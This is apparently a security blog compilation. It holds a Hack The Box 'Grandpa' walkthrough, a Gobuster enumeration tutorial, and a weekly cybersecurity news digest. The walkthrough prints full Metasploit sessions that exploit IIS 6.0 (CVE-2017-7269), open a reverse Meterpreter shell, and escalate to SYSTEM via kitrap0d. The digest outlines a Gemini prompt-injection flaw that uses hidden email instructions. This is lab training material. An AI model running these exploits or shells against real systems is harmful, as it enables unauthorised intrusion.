HTB: Grandpa

 ___  ___  _________  ________                                      
|\  \|\  \|\___   ___\\   __  \  ___                                
\ \  \\\  \|___ \  \_\ \  \|\ /_|\__\                               
 \ \   __  \   \ \  \ \ \   __  \|__|                               
  \ \  \ \  \   \ \  \ \ \  \|\  \  ___                             
   \ \__\ \__\   \ \__\ \ \_______\|\__\                            
    \|__|\|__|    \|__|  \|_______|\|__|                            
 ________  ________  ________  ________   ________                  
|\   ____\|\   __  \|\   __  \|\   ___  \|\   ___ \                 
\ \  \___|\ \  \|\  \ \  \|\  \ \  \\ \  \ \  \_|\ \  ____________  
 \ \  \  __\ \   _  _\ \   __  \ \  \\ \  \ \  \ \\ \|\____________\
  \ \  \|\  \ \  \\  \\ \  \ \  \ \  \\ \  \ \  \_\\ \|____________|
   \ \_______\ \__\\ _\\ \__\ \__\ \__\\ \__\ \_______\             
    \|_______|\|__|\|__|\|__|\|__|\|__| \|__|\|_______|             
 ________  ________                                                 
|\   __  \|\   __  \                                                
\ \  \|\  \ \  \|\  \                                               
 \ \   ____\ \   __  \                                              
  \ \  \___|\ \  \ \  \                                             
   \ \__\    \ \__\ \__\                                            
    \|__|     \|__|\|__|                                            
                                                                      

Hack The Box's Grandpa is an Easy Windows machine with an open service of Microsoft IIS version 6.0 which has a remote command execution vulnerability (CVE-2017-7269). This machine uses basic enumeration using Nmap, easy to obtain exploits that are available as Metasploit modules, and some basic privilege escalation.

Once starting the machine on HTB and connecting to your HTB VPN, we will start by opening our terminal and pinging the machine's IP address to make sure the network is up. Make sure the IP address you enter matches the one displayed on HTB when you boot up the target machine.

ping 10.129.95.233

You should receive responses from the IP address. You can press CTRL + C to stop sending packets to the target host. Once confirming the network is up and running, it's time to move to enumeration using Nmap.

Start by doing a quick service scan using Nmap. We will use the -sV switch to enable version detection. You can learn more about Nmap here.

nmap -sV 10.129.95.233
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-07-15 15:04 CDT
Nmap scan report for 10.129.95.233
Host is up (0.076s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.27 seconds

On port 80 we see an open service of Microsoft IIS version 6.0 running. After some searching on the web we find that this service has a remote command execution vulnerability, CVE-2017-7269. Let's fire-up Metasploit and search for potential exploits:

msfconsole
Metasploit tip: Open an interactive Ruby terminal with irb
                                                  
 ______________________________________
/ it looks like you're trying to run a \
\ module                               /
 --------------------------------------
 \
  \
     __
    /  \
    |  |
    @  @
    |  |
    || |/
    || ||
    |\_/|
    \___/


       =[ metasploit v6.4.43-dev                          ]
+ -- --=[ 2483 exploits - 1279 auxiliary - 393 post       ]
+ -- --=[ 1463 payloads - 49 encoders - 13 nops           ]
+ -- --=[ 9 evasion                                       ]

Metasploit Documentation: https://docs.metasploit.com/

[msf](Jobs:0 Agents:0) >> search CVE-2017-7269

Matching Modules
================

   #  Name                                                 Disclosure Date  Rank    Check  Description
   -  ----                                                 ---------------  ----    -----  -----------
   0  exploit/windows/iis/iis_webdav_scstoragepathfromurl  2017-03-26       manual  Yes    Microsoft IIS WebDav ScStoragePathFromUrl Overflow


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/iis/iis_webdav_scstoragepathfromurl

[msf](Jobs:0 Agents:0) >> 

We see option #0 which is a buffer overflow vulnerability in the ScStoragePathFromUrl function within the IIS 6.0 WebDAV service. You can read more about this specific exploit on Rapid7's website here. Let's select this attack and fill out the required exploit options:

[msf](Jobs:0 Agents:0) >> use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> options

Module options (exploit/windows/iis/iis_webdav_scstoragepathfromurl):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   MAXPATHLENGTH  60               yes       End of physical path brute force
   MINPATHLENGTH  3                yes       Start of physical path brute forc
                                             e
   Proxies                         no        A proxy chain of format type:host
                                             :port[,type:host:port][...]
   RHOSTS                          yes       The target host(s), see https://d
                                             ocs.metasploit.com/docs/using-met
                                             asploit/basics/using-metasploit.h
                                             tml
   RPORT          80               yes       The target port (TCP)
   SSL            false            no        Negotiate SSL/TLS for outgoing co
                                             nnections
   TARGETURI      /                yes       Path of IIS 6 web application
   VHOST                           no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thr
                                        ead, process, none)
   LHOST     85.9.199.172     yes       The listen address (an interface may b
                                        e specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Windows Server 2003 R2 SP2 x86



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set RHOSTS 10.129.95.233
RHOSTS => 10.129.95.233
[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:0)

We set the RHOSTS to the target ip address and the LHOST to our desired listening ip address for the reverse TCP connection. We can now run this exploit:

[msf](Jobs:0 Agents:0) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (177734 bytes) to 10.129.95.233
[*] Meterpreter session 1 opened (10.10.14.241:4444 -> 10.129.95.233:1030) at 2025-07-15 15:10:26 -0500

(Meterpreter 1)(c:\windows\system32\inetsrv) > 

We now have user access to the target machine. After some digging on the system we find we need administrator access in order to get the user .txt flag. We will need to do some privilege escalation. Let's first migrate to a stable process using NT AUTHORITY\NETWORK 
SERVICE. After listing the current services, let's switch to the  davcdata.exe process using the migrate command.

(Meterpreter 1)(c:\windows\system32\inetsrv) > ps

Process List
============

 PID   PPID  Name         Arch  Session  User               Path
 ---   ----  ----         ----  -------  ----               ----
 0     0     [System Pro
             cess]
 4     0     System
 272   4     smss.exe
 320   272   csrss.exe
 344   272   winlogon.ex
             e
 392   344   services.ex
             e
 404   344   lsass.exe
 580   392   svchost.exe
 668   392   svchost.exe
 732   392   svchost.exe
 776   392   svchost.exe
 796   392   svchost.exe
 944   392   spoolsv.exe
 972   392   msdtc.exe
 1092  392   cisvc.exe
 1136  392   svchost.exe
 1192  392   inetinfo.ex
             e
 1228  392   svchost.exe
 1368  392   VGAuthServi
             ce.exe
 1420  392   vmtoolsd.ex
             e
 1508  392   svchost.exe
 1608  392   svchost.exe
 1836  392   alg.exe
 1872  392   dllhost.exe
 1892  580   wmiprvse.ex  x86   0        NT AUTHORITY\NETW  C:\WINDOWS\system3
             e                           ORK SERVICE        2\wbem\wmiprvse.ex
                                                            e
 2420  580   wmiprvse.ex
             e
 3620  1508  w3wp.exe     x86   0        NT AUTHORITY\NETW  c:\windows\system3
                                         ORK SERVICE        2\inetsrv\w3wp.exe
 3692  580   davcdata.ex  x86   0        NT AUTHORITY\NETW  C:\WINDOWS\system3
             e                           ORK SERVICE        2\inetsrv\davcdata
                                                            .exe
 3812  3620  rundll32.ex  x86   0                           C:\WINDOWS\system3
             e                                              2\rundll32.exe

(Meterpreter 1)(c:\windows\system32\inetsrv) > migrate 3692
[*] Migrating from 3812 to 3692...
[*] Migration completed successfully.
(Meterpreter 1)(C:\WINDOWS\system32) > 

After migrating, we can background this session using the background command and search for an exploit for our target system using local_exploit_suggester:

(Meterpreter 1)(C:\WINDOWS\system32) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(windows/iis/iis_webdav_scstoragepathfromurl) >> use post/multi/recon/local_exploit_suggester
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> options

Module options (post/multi/recon/local_exploit_suggester):

   Name             Current Setting  Required  Description
   ----             ---------------  --------  -----------
   SESSION                           yes       The session to run this module
                                               on
   SHOWDESCRIPTION  false            yes       Displays a detailed description
                                                for the available exploits


View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set SESSION 1
SESSION => 1
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> run
[*] 10.129.95.233 - Collecting local exploits for x86/windows...
[*] 10.129.95.233 - 202 exploit checks are being tried...
[+] 10.129.95.233 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.129.95.233 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.129.95.233 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.129.95.233 - Valid modules for session 1:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 2   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/ms14_070_tcpip_ioctl                     Yes                      The target appears to be vulnerable.
 4   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 5   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms16_075_reflection                      Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ppr_flatten_rec                          Yes                      The target appears to be vulnerable.
 8   exploit/windows/local/adobe_sandbox_adobecollabsync            No                       Cannot reliably check exploitability.
 9   exploit/windows/local/agnitum_outpost_acs                      No                       The target is not exploitable.
 10  exploit/windows/local/always_install_elevated                  No                       The target is not exploitable.
 11  exploit/windows/local/anyconnect_lpe                           No                       The target is not exploitable. vpndownloader.exe not found on file system
 12  exploit/windows/local/bits_ntlm_token_impersonation            No                       The check raised an exception.
 13  exploit/windows/local/bthpan                                   No                       The target is not exploitable.
 14  exploit/windows/local/bypassuac_comhijack                      No                       The target is not exploitable.
 15  exploit/windows/local/bypassuac_eventvwr                       No                       The target is not exploitable.
 16  exploit/windows/local/bypassuac_fodhelper                      No                       The target is not exploitable.
 17  exploit/windows/local/bypassuac_sluihijack                     No                       The target is not exploitable.
 18  exploit/windows/local/canon_driver_privesc                     No                       The target is not exploitable. No Canon TR150 driver directory found
 19  exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   No                       The target is not exploitable. Target is not running a vulnerable version of Windows!
 20  exploit/windows/local/cve_2020_1048_printerdemon               No                       The target is not exploitable.
 21  exploit/windows/local/cve_2020_1337_printerdemon               No                       The target is not exploitable.
 22  exploit/windows/local/gog_galaxyclientservice_privesc          No                       The target is not exploitable. Galaxy Client Service not found
 23  exploit/windows/local/ikeext_service                           No                       The check raised an exception.
 24  exploit/windows/local/ipass_launch_app                         No                       The check raised an exception.
 25  exploit/windows/local/lenovo_systemupdate                      No                       The check raised an exception.
 26  exploit/windows/local/lexmark_driver_privesc                   No                       The check raised an exception.
 27  exploit/windows/local/mqac_write                               No                       The target is not exploitable.
 28  exploit/windows/local/ms10_092_schelevator                     No                       The target is not exploitable. Windows Server 2003 (5.2 Build 3790, Service Pack 2). is not vulnerable
 29  exploit/windows/local/ms13_053_schlamperei                     No                       The target is not exploitable.
 30  exploit/windows/local/ms13_081_track_popup_menu                No                       Cannot reliably check exploitability.
 31  exploit/windows/local/ms15_004_tswbproxy                       No                       The target is not exploitable.
 32  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  No                       The check raised an exception.
 33  exploit/windows/local/ms16_075_reflection_juicy                No                       The target is not exploitable.
 34  exploit/windows/local/ms_ndproxy                               No                       The target is not exploitable.
 35  exploit/windows/local/novell_client_nicm                       No                       The target is not exploitable.
 36  exploit/windows/local/ntapphelpcachecontrol                    No                       The check raised an exception.
 37  exploit/windows/local/ntusermndragover                         No                       The target is not exploitable.
 38  exploit/windows/local/panda_psevents                           No                       The target is not exploitable.
 39  exploit/windows/local/ricoh_driver_privesc                     No                       The target is not exploitable. No Ricoh driver directory found
 40  exploit/windows/local/tokenmagic                               No                       The target is not exploitable.
 41  exploit/windows/local/virtual_box_guest_additions              No                       The target is not exploitable.
 42  exploit/windows/local/webexec                                  No                       The check raised an exception.

[*] Post module execution completed
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> 

We will receive a list of potential exploits for our target system. We will be using option 1, ms10_015_kitrap0d. You can read more about this privilege escalation exploit here. Lets use this exploit, set our options and run:

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use exploit/windows/local/ms10_015_kitrap0d
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> options

Module options (exploit/windows/local/ms10_015_kitrap0d):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     194.113.72.151   yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows 2K SP4 - Windows 7 (x86)



View the full module info with the info, or info -d command.

[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set SESSION 1
SESSION => 1
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> set LHOST 10.10.14.241
LHOST => 10.10.14.241
[msf](Jobs:0 Agents:1) exploit(windows/local/ms10_015_kitrap0d) >> exploit
[*] Started reverse TCP handler on 10.10.14.241:4444 
[*] Reflectively injecting payload and triggering the bug...
[*] Launching netsh to host the DLL...
[+] Process 3292 launched.
[*] Reflectively injecting the DLL into 3292...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.129.95.233
[*] Meterpreter session 2 opened (10.10.14.241:4444 -> 10.129.95.233:1031) at 2025-07-16 10:56:22 -0500

(Meterpreter 2)(C:\WINDOWS\system32) > 

It looks like the exploit was successful. Let's run getuid and see who we are:

(Meterpreter 2)(C:\WINDOWS\system32) > getuid
Server username: NT AUTHORITY\SYSTEM

You can now navigate through the target system as an administrator to obtain the root and user .txt flag.

Gobuster Basics for Penetration Testing

   ______      __               __           
  / ____/___  / /_  __  _______/ /____  _____
 / / __/ __ \/ __ \/ / / / ___/ __/ _ \/ ___/
/ /_/ / /_/ / /_/ / /_/ (__  ) /_/  __/ /    
\____/\____/_.___/\__,_/____/\__/\___/_/     
                                             

Gobuster is a open-source command-line tool for web content discovery and vulnerability assessment. Security professionals and ethical hackers utilize Gobuster for reconnaissance, efficiently brute-forcing directories, files, DNS subdomains, and virtual hosts on web servers. This powerful enumeration tool, written in Go, helps uncover hidden resources, misconfigurations, and potential attack vectors during penetration testing.

By leveraging custom wordlists and flexible operational modes, Gobuster allows for targeted and efficient website scanning and subdomain enumeration. It's an indispensable hacking tool for identifying overlooked administration panels, sensitive files, and forgotten development environments, significantly enhancing the intelligence-gathering phase of any security audit or bug bounty hunting. 

Let's start off by learning about directory enumeration using Gobuster, which can help us discover hidden directories and files within a web server. These files can be vital to us, and may contain backup files, configuration files, temporary files, and even something as sensitive as a password list in a text file. Let's see an example command below and break down its structure:

gobuster dir -u https://examplesite.com -w /usr/share/dirb/wordlists/common.txt 

We can use the "dir" argument to let Gobuster know we want to scan for directories, the "-u" option to mark that we want to scan the URL that follows in the command, and the "-w" option to mark that we want to use a wordlist, followed by the path to the wordlist we want to use.

Wordlists can be downloaded off the web but most versions of Kali Linux come with some common wordlists usually located at /usr/share/wordlists. Gobuster's GUI older brother, Dirbuster, comes installed with it's own wordlists which you can utilize with Gobuster as well. I also highly suggest you check out SecLists on GitHub. It's listed on my "Resources:" link list for a reason.

Results of a directory scan using Gobuster will look like the following:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://examplesite.com/
[+] Method:                  GET
[+] Threads:                 50
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              php,txt
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.php            (Status: 200) [Size: 6690]
/help.php             (Status: 200) [Size: 6689]
/themes               (Status: 301) [Size: 0] [--> https://examplesite.com/themes/]
/stats.php            (Status: 200) [Size: 6690]
/css                  (Status: 301) [Size: 0] [--> https://examplesite.com/css/]
/edit.php             (Status: 200) [Size: 6689]
/includes             (Status: 301) [Size: 0] [--> https://examplesite.com/includes/]
/license.php          (Status: 200) [Size: 6692]
/system.php           (Status: 200) [Size: 6691]
/status.php           (Status: 200) [Size: 6691]
/javascript           (Status: 301) [Size: 0] [--> https://examplesite.com/javascript/]
/changelog.txt        (Status: 200) [Size: 271]
/classes              (Status: 301) [Size: 0] [--> https://examplesite.com/classes/]
/exec.php             (Status: 200) [Size: 6689]
/widgets              (Status: 301) [Size: 0] [--> https://examplesite.com/widgets/]
/graph.php            (Status: 200) [Size: 6690]
/tree                 (Status: 301) [Size: 0] [--> https://examplesite.com/tree/]
/wizard.php           (Status: 200) [Size: 6691]
/shortcuts            (Status: 301) [Size: 0] [--> https://examplesite.com/shortcuts/]
/pkg.php              (Status: 200) [Size: 6688]
/installer            (Status: 301) [Size: 0] [--> https://examplesite.com/installer/]
/wizards              (Status: 301) [Size: 0] [--> https://examplesite.com/wizards/]
/xmlrpc.php           (Status: 200) [Size: 384]
/reboot.php           (Status: 200) [Size: 6691]
/interfaces.php       (Status: 200) [Size: 6695]
/csrf                 (Status: 301) [Size: 0] [--> https://examplesite.com/csrf/]
/system-users.txt     (Status: 200) [Size: 106]
/filebrowser          (Status: 301) [Size: 0] [--> https://examplesite.com/filebrowser/]

We receive a list of directories and files on the web server. These discoveries are flagged with HTTP status codes that signify whether the directory or file has been successfully found. Status codes of 200 mean the directory or file has been found while 301 means it has been moved and will be followed with the correct URL of the moved directory. Other common HTTP status codes include 4xx (Client Error), 5xx (Server Error), and 1xx (Informational).

Using this information, we can download discovered files by using wget:

wget http://examplesite.com/path/to/discovered_file.ext

We can also continue using Gobuster on discovered directories to do some deeper digging i.e. https://examplesite.com/filebrowser/.

Next we will learn about scanning for subdomains. Scanning for subdomains expands the attack surface by uncovering hidden or less-secured subdomains, which can host vulnerable applications or services often missed during initial recon. By brute-forcing common prefixes, we can find subdomains not found in public sources, aiding in the identification of potential attack targets and providing a more comprehensive understanding of a target. We can scan for subdomains by simply swapping in the "dns" argument into our command:

gobuster dns -d examplesite.com -w /usr/share/dirb/wordlists/common.txt 

We have added the "-d" option to our command to mark the target domain. Notice we removed the "https://" from our domain. We do not need to specify the protocol when executing a subdomain scan. Following the target domain we will use the "-w" option followed by the path to our wordlist. There are many common subdomain wordlists that can be found on the web which will help with acquiring better results. Below is an example of subdomain scan results:

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Domain:     examplesite.com
[+] Threads:    10
[+] Timeout:    1s
[+] Wordlist:   /usr/share/dirb/wordlists/common.txt
===============================================================
2025/07/17 16:20:35 Starting gobuster in DNS enumeration mode
===============================================================
Found: www.examplesite.com
Found: nagios.examplesite.com
Found: admin.examplesite.com
Found: about.examplesite.com
Found: dev.examplesite.com   
Found: auto.examplesite.com  
Found: login.examplesite.com

Similar to scanning for subdomains, Gobuster has the ability to scan for virtual hosts. Virtual host (vhost) scanning is a technique used to detect additional websites that reside on the same physical server, but are accessible through different virtual host configurations or domain names. To find vhosts, Gobuster sends HTTP requests to the target IP, changing the 'Host' header in each with names from a wordlist. If a virtual host exists, the web server replies with its content. By performing vhost scanning, you can find unlisted websites or applications that reside on the same server as a familiar site, even if they're not publicly discoverable through DNS.

We can scan for vhosts by using the following command:

gobuster vhost -u examplesite.com -w /usr/share/dirb/wordlists/common.txt 

Results of the scan will appear similar to the following: 

===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          examplesite.com
[+] Threads:      10
[+] Wordlist:     /usr/share/dirb/wordlists/common.txt 
[+] User Agent:   gobuster/3.6
[+] Timeout:      10s
===============================================================
2025/07/17 8:11:38 Starting gobuster in VHOST enumeration mode
===============================================================
Found: auto.examplesite.com (Status: 200) [Size: 162]
Found: mail.examplesite.com (Status: 200) [Size: 162]
Found: beta.examplesite.com (Status: 200) [Size: 162]
Found: api.examplesite.com (Status: 200) [Size: 162]
Found: apache.examplesite.com (Status: 200) [Size: 162]

Gobuster has many more options that can be added to our basic scans. For example, we can use the "-d" flag to set a delay in our scanning process which is beneficial for stability, performance, and stealth. Or the "-x" flag which is used for filtering file extensions during the scan. For instance, if you want to specifically search for images, you might use the following command:

gobuster dir -u https://examplesite.com -w /usr/share/dirb/wordlists/common.txt -x jpg,jpeg,png,gif,ico

Be sure to check out additional flags by using "--help".

CyberChannel: Week of 7/13/25

Google Gemini Flaw Exposes Users to Advanced Phishing via Email Summaries 

A critical Google Gemini flaw has been identified, allowing sophisticated phishing attacks through email summaries. This vulnerability leverages "prompt-injection" techniques, where attackers embed hidden malicious instructions within emails using HTML/CSS. When Google Gemini generates AI summaries, it unknowingly displays these harmful prompts as legitimate content, potentially directing users to dangerous phishing sites. Unlike traditional spam, these cybersecurity threats bypass standard filters due to their trusted appearance within Gemini's interface, creating a significant risk for users despite no current evidence of in-the-wild exploitation.

Gigabyte Firmware Flaw: Malware Can Disable Secure Boot & Gain Full Control 

A critical UEFI firmware vulnerability impacts numerous Gigabyte motherboards (legacy Intel-based), allowing malware to bypass Secure Boot. This serious security flaw enables attackers to execute code in System Management Mode (SMM), gaining persistent, stealthy control over the system, undetected by standard operating system defenses. While requiring initial administrative access, exploitation occurs early in the boot process. Gigabyte urges users to perform a firmware update to mitigate this significant security risk.  

Interlock Ransomware Unleashes "FileFix" Attack for Stealthy Malware Delivery 

The Interlock ransomware group is now using a novel "FileFix" attack to distribute its malware, including advanced PHP and Node.js Remote Access Trojans (RATs). This sophisticated cybersecurity threat compromises legitimate websites, tricking users into a fake "human verification" process that coaxes them into executing malicious commands, effectively bypassing traditional security. Once active, the Interlock RAT establishes persistence, performs reconnaissance, and leverages services like Cloudflare Tunnel for stealthy command-and-control, representing a significant and evolving malware delivery method impacting various industries. 

Police Bust "Diskstation" Ransomware Gang Targeting Synology NAS Devices 

An international law enforcement operation led by Europol has successfully dismantled the "Diskstation" ransomware gang, which specifically targeted Synology NAS devices globally since 2021. This cybercrime group, operating from Romania, exploited internet-exposed Network-Attached Storage (NAS) devices to encrypt data and demand significant ransomware payments. Through forensic analysis and blockchain tracing, police identified key suspects, leading to raids and the arrest of the alleged primary operator 

North Korean XORIndex Malware Found in 67 Malicious npm Packages 

North Korean threat actors are exploiting the npm Registry with 67 malicious packages, deploying advanced XORIndex malware within their "Contagious Interview" cybersecurity campaign. This highly obfuscated malware specifically targets JavaScript developers in the open-source ecosystem, designed to exfiltrate critical host telemetry and cryptocurrency wallet credentials.  

CVE-2025-25257: FortiWeb Vulnerability Enables Unauthenticated RCE Attacks 

A critical Fortinet FortiWeb vulnerability (CVE-2025-25257) is allowing unauthenticated remote code execution (RCE) due to a SQL injection flaw. Attackers are actively exploiting this in the wild, deploying webshells on unpatched FortiWeb appliances via public Proof-of-Concept exploits. These successful FortiWeb hacks grant attackers persistent access and control over the affected devices. Organizations must patch immediately or disable the administrative interface to mitigate this severe cybersecurity risk. 

U.S. Army Soldier Pleads Guilty to Hacking & Extortion of Tech/Telecom Firms 

A former U.S. Army soldier, Cameron John Wagenius ("kiberphan0m"), has pleaded guilty to hacking and extortion charges, targeting 10 prominent tech and telecom firms. While on active duty, Wagenius orchestrated data breaches, stealing sensitive data like customer records and call logs using tools such as SSH Brute. He then attempted to extort over $1 million in ransom from these companies, threatening to leak the stolen information on cybercrime forums. Wagenius also admitted to unlawfully transferring confidential phone records and is linked to the Snowflake data breach, highlighting a significant cybersecurity threat from inside actors. 

Salt Typhoon Breaches National Guard: Chinese Hackers Steal Network Configs 

A Chinese state-sponsored hacking group, Salt Typhoon, successfully breached a U.S. Army National Guard network for nine months, stealing critical network configurations, administrator credentials, and service members' personal data. This cybersecurity breach highlights the persistent threat from Chinese hackers who target old vulnerabilities in networking devices. Salt Typhoon, linked to China's Ministry of State Security, has a history of compromising U.S. government and critical infrastructure, prompting the Department of Homeland Security (DHS) to issue warnings and urge immediate patching and stronger access controls to combat these sophisticated APT attacks.  

New AI Malware Threat: LameHug Uses LLMs for Dynamic Data Exfiltration 

A new cybersecurity threat, LameHug malware, is emerging, characterized by its innovative use of AI Large Language Models (LLMs) to craft Windows data-theft commands in real-time. This sophisticated AI-powered malware dynamically generates precise commands for data exfiltration from compromised systems. Leveraging LLM capabilities, LameHug can adapt its attack methods on the fly, posing a significant challenge to traditional security defenses and marking an advanced step in how threat actors weaponize artificial intelligence for more potent and evasive malware attacks. 

CVE-2025-5777: Citrix Bleed 2 Actively Exploited Before Public PoCs 

A critical Citrix Bleed 2 vulnerability (CVE-2025-5777) in Citrix NetScaler ADC and Gateway appliances was actively exploited by threat actors for weeks, even as Citrix denied attacks. This security flaw (a memory disclosure vulnerability) allows attackers to bypass MFA and hijack user sessions by leaking sensitive data like session tokens. With public PoC exploits now available, widespread exploitation has led to its inclusion in CISA's Known Exploited Vulnerabilities catalog. Organizations must urgently patch Citrix Bleed 2 and terminate all sessions to mitigate this severe cybersecurity risk and prevent further Citrix hacks.